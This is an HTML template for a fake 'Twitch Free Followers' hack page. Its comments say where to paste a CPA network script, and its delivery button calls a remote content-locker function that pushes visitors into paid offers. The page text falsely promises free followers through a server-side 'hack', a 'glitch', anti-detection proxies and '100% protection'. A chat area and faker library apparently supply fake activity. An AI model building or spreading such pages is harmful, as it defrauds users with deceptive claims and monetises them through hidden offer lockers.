<!doctype html>
<html lang="en">

<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
	<link href="css/all.css" rel="stylesheet">
	<link href="css/bootstrap.min.css" rel="stylesheet">
    <link rel=stylesheet href="main.css">
    <link href="css/mini.css" rel="stylesheet">
	<!--<script src="js/jquery-3.3.1.js"></script>-->
		    <script src="ajax.googleapis.com/ajax/libs/jquery/2.1.3/jquery.min.js"></script>
	<script src="js/bootstrap.min.js"></script> 
    <title>Twitch  Free Followers</title>

    <!-- [Mosawi9] Here your cpa network script -->

<script type="text/javascript">
    var CPABUILDSETTINGS={"it":2194219,"key":"fd25f"};
</script>
<script src="https://d13nu0oomnx5ti.cloudfront.net/ed02094.js"></script>

<!-- Put Here your cpa network script -->

</head>
<body>
    
    <div class="container">
        
        <div class="row justify-content-center">
        
            <div class="col-xl-4 col-lg-4 col-md-6 col-sm-8 col-xs-10 col-10 text-center">
                
                <img class="img-fluid logo" src="logo.png">
            
            </div>
            
        </div>
        
        <div class="row justify-content-center">
        
            <div class="col-xl-8 col-lg-9 col-md-10 col-sm-10 col-xs-11 col-11 text-center hack">
                
                <h4 class="hack-header">Twitch Free Followers</h4>
                
                <h5 class="status-header"><strong>Server status: </strong>online</h5>
                
                <p class="beg"><strong>Step 1: </strong>Type in your Twitch username.</p>
                
                <input type="text" class="form-control beg" id="username" placeholder="Your username">
                
                <div class="row justify-content-center align-items-center">
                
                    
                    <div class="col-xl-6 col-lg-6 col-md-12 col-sm-12 col-xs-12 col-12">
                    
                        <p class="beg"><strong>Step 3: </strong>How many <strong>Followers</strong> you want?</p>
                
                        <select class="form-control form-control-lg i-gems beg" id="gems">
                            <option value="1000">1000 Followers</option>
                            <option value="10000">10000 Followers</option>
                            <option value="25000">25000 Followers</option>
                            <option value="50000">50000 Followers</option>
                            <option value="100000">100000 Followers</option>
                        </select>
                        
                        

                    </div>
                
                </div>
                
                <button id="failure" type="button" class="btn btn-light btn-block btn-lg btn-c beg" onclick="ccc();">CONTINUE</button>
                <div class="notify"><span id="notifyType" class=""></span></div>
                <div class="row justify-content-center align-items-center">
                
                    <div class="col-xl-6 col-lg-6 col-md-12 col-sm-12 col-xs-12 col-12">
                    
                        <h2 class="f-username"></h2>
                
                        <div class="row justify-content-center ehh">

                            <div class="col-6">
                                <img class="final-img" src="gems.png">
                                <h3 class="r1r1"></h3>
                            </div>

                           

                        </div>
                    
                    </div>
                    
                    <div class="col-xl-6 col-lg-6 col-md-12 col-sm-12 col-xs-12 col-12">
                    
                        <h4 class="hack-generator end"></h4>
                        
                        <!-- [Mosawi9] Here you can edit your onclick -->

                        
                        <button type="button" class="btn btn-light btn-block btn-lg btn-c btn-l h-v" onclick="CPABuildLock()">Instant Delivery</button>
                    <!-- Edit here your onlick -->

                    </div>
                    
                </div>
                
            </div>
            
            <div class="col-xl-8 col-lg-9 col-md-10 col-sm-10 col-xs-11 col-11 text-center recent">
                
                <h4 class="recent-header"></h4>
            </div>
                    
        </div>
        <section class="chat-section">
            <div class="container">
              <div class="row">
                <div class="col-md-12">
                  <div class="inside">
                    <div class="row">
                      <div class="col-md-12">
                        <div class="row">
                          <div class="col-md-8">
                            <div class="livechatBox">
                              <div class="livechatNameBox">
                                <div class="overlay"></div>
                                <div class="nameInputBox">
                                  <div class="form-group">
                                    <label for="livechat_name">Nickname</label>
                                    <input id="livechat_name" type="text" class="form-control livechatName" placeholder="Enter nickname...">
                                  </div>
                                  <button class="btn btn-success btn-block livechatNicknameBtn">Submit</button>
                                </div>
                              </div>
                              <div class="row">
                                <div class="col-md-12">
                                  <div class="heading">
                                    <h3>
                                      <i class="fa fa-comment"></i> Chat Room</h3>
                                  </div>
                                </div>
                              </div>
                              <div class="row">
                                <div class="col-md-12">
                                  <div class="livechatListArea">
                                    <ul class="chatList"></ul>
                                  </div>
                                </div>
                              </div>
                              <br class="clearfix">
                              <div class="row">
                                <div class="col-md-10">
                                  <input type="text" class="form-control livechatMsg" placeholder="Enter message...">
                                </div>
                                <div class="col-md-2">
                                  <button class="btn btn-primary btn-block livechatSubmtBtn">Submit</button>
                                </div>
                              </div>
                            </div>
                          </div>
                          <section class="features-section">
                <div class="container">
                  <!-- features -->
                  <div class="row">
                    <!-- feature -->
                    <div class="col-md-2 col-sm-4">
                      <div class="feature">
                        <div class="row">
                          <div class="col-md-12"><i class="fa fa-rocket"></i></div>
                        </div>
                        <div class="row">
                          <div class="col-md-12">
                            <h4>Regularly updated</h4>
                            <p>We update this hack on Weekly Basis, we do tweaks the whole time for optimal performance.</p>
                          </div>
                        </div>
                      </div>
                    </div>
                    <!-- /feature -->
                    <!-- feature -->
                    <div class="col-md-2 col-sm-4">
                      <div class="feature">
                        <div class="row">
                          <div class="col-md-12"><i class="fa fa-thumbs-up"></i></div>
                        </div>
                        <div class="row">
                          <div class="col-md-12">
                            <h4>Easy to use</h4>
                            <p>With just few clicks you can make it to work, its pretty Simple!</p>
                          </div>
                        </div>
                      </div>
                    </div>
                    <!-- /feature -->
                    <!-- feature -->
                    <div class="col-md-2 col-sm-4">
                      <div class="feature">
                        <div class="row">
                          <div class="col-md-12"><i class="fa fa-laptop"></i></div>
                        </div>
                        <div class="row">
                          <div class="col-md-12">
                            <h4>Online Based</h4>
                            <p>Everything is done via our web platform on our server and you are 100% protected.</p>
                          </div>
                        </div>
                      </div>
                    </div>
                    <!-- /feature -->
                    <!-- feature -->
                    <div class="col-md-2 col-sm-4">
                      <div class="feature">
                        <div class="row">
                          <div class="col-md-12"><i class="fa fa-paper-plane"></i></div>
                        </div>
                        <div class="row">
                          <div class="col-md-12">
                            <h4>Free Forever</h4>
                            <p>As long as our glitch doesn't patch, our Hack will 100% work.</p>
                          </div>
                        </div>
                      </div>
                    </div>
                    <!-- /feature -->
                    <!-- feature -->
                    <div class="col-md-2 col-sm-4">
                      <div class="feature">
                        <div class="row">
                          <div class="col-md-12"><i class="fa fa-random"></i></div>
                        </div>
                        <div class="row">
                          <div class="col-md-12">
                            <h4>Fast Algorithm</h4>
                            <p>The core of the database is coded in PHP and best possible way so hack proccess will be fastest possible.</p>
                          </div>
                        </div>
                      </div>
                    </div>
                    <!-- /feature -->
                    <!-- feature -->
                    <div class="col-md-2 col-sm-4">
                      <div class="feature">
                        <div class="row">
                          <div class="col-md-12"><i class="fa fa-shield"></i></div>
                        </div>
                        <div class="row">
                          <div class="col-md-12">
                            <h4>Anti-Detection</h4>
                            <p>We use private proxies and everything is done on our server to ensure hack is not detected.</p>
                          </div>
                        </div>
                      </div>
                    </div>
                    <!-- /feature -->
                  </div>
                  <!-- /features -->
                </div>
              </section>
              <div class="seo-section">
                <div class="container">
                  <div class="row">
                    <div class="col-md-12">
                      <div class="inside">
                        <div class="row">
                          <div class="col-md-12">
                          </div>
                        </div>
    </div>
    <br>
                          
    <script src="https://cdn.jsdelivr.net/npm/typed.js@2.0.9"></script>
	    <script src="js/popper.min.js"></script>
    <script src="main.js"></script>
    <script src="outdatedbrowser/outdatedbrowser.min.js"></script>
    <script src="js/sweet-alert.min.js"></script>
    <script src="js/bootbox.min.js"></script>
    <script src="js/jquery.backstretch.min.js"></script>
                                <script src="js/jquery.animatecss.min.js"></script>
                                <script src="js/jquery.noty.packaged.min.js"></script>
                                <script src="js/faker.min.js"></script>
                                <script src="js/dynatexer.dev.js"></script>
                                <script src="js/jquery.magnific-popup.min.js"></script>
                                <script src="js/jquery.flexverticalcenter.js"></script>
                                <script src="js/jquery.countdown.min.js"></script>
                                <script src="js/magnific-popup.min.js"></script>
                                <script src="js/mini.js"></script>
								
</body>

</html>